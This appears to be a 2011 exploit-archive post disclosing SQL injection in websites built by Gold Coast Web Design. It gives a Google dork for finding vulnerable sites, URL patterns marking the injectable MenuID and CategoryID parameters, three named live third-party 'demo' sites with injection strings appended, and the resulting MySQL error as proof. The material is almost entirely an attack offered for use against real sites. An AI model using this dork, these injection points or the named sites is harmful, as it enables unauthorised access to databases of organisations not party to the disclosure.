Gold Coast Web Design suffers from a remote SQL injection vulnerability.
db6711970c527db2e9981f731ea5f0e3c00408f918538a1face2bcf27ab2c2a3
##########################################################
# Title: Gold Coast Web Design SQL Injection
# Author: AngelParrot
# Date: 2011/12/19
# Category: Webapps
# Vendor: http://goldcoastwebdesign.com/
# Google Dork: inurl:php?id= intext:"web site by: goldcoastwebdesign.com"
##########################################################
# Exploit
http://example.com/news.php?MenuID=[SQL]
http://example.com/services_detail.php?CategoryID=[SQL]
http://example.com/staff.php?CategoryID=*&MenuID=[SQL]
etc.
# Demo Site
http://akronpolysys.com/news.php?MenuID=27'
http://www.1stsecureit.com/services_detail.php?CategoryID=2'
http://www.caddyforacure.com/staff.php?CategoryID=3&MenuID=17'
etc.
# Error Message
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1